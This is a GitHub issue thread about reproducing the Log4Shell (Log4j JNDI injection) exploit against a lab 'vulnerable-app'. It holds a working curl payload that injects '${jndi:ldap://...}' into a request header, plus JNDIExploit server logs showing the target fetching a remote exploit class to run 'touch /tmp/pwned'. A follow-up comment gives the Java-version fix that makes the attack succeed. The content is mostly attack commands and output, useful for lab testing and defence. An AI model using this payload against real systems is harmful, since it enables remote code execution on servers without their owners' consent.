ExploitpH25JWpys1 cannot be cast to javax.naming.spi.ObjectFactory
mzoltan opened this issue · comments
mzoltan commented
Trying repro with the same commands.
vulnerable app says:
2021-12-10 22:28:10,179 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExploitpH25JWpys1 cannot be cast to javax.naming.spi.ObjectFactory]; remaining name '"Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo="'
JNDIExploit-1.2-SNAPSHOT.jar says
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
[+] Paylaod: command
[+] Command: touch /tmp/pwned
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= redirecting to http://172.17.0.1:8888/ExploitpH25JWpys1.class
[+] New HTTP Request From /172.17.0.2:49758 /ExploitpH25JWpys1.class
[+] Receive ClassRequest: ExploitpH25JWpys1.class
[+] Response Code: 200
curl says
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Hello, world!
mzoltan commented
I'll leave it here for posterity - you've got to mind the Java version you're running JNDIExploit-1.2-SNAPSHOT.jar with as well. Ran it with the same as vulnerable-app, using the same image for simplicity, and it works.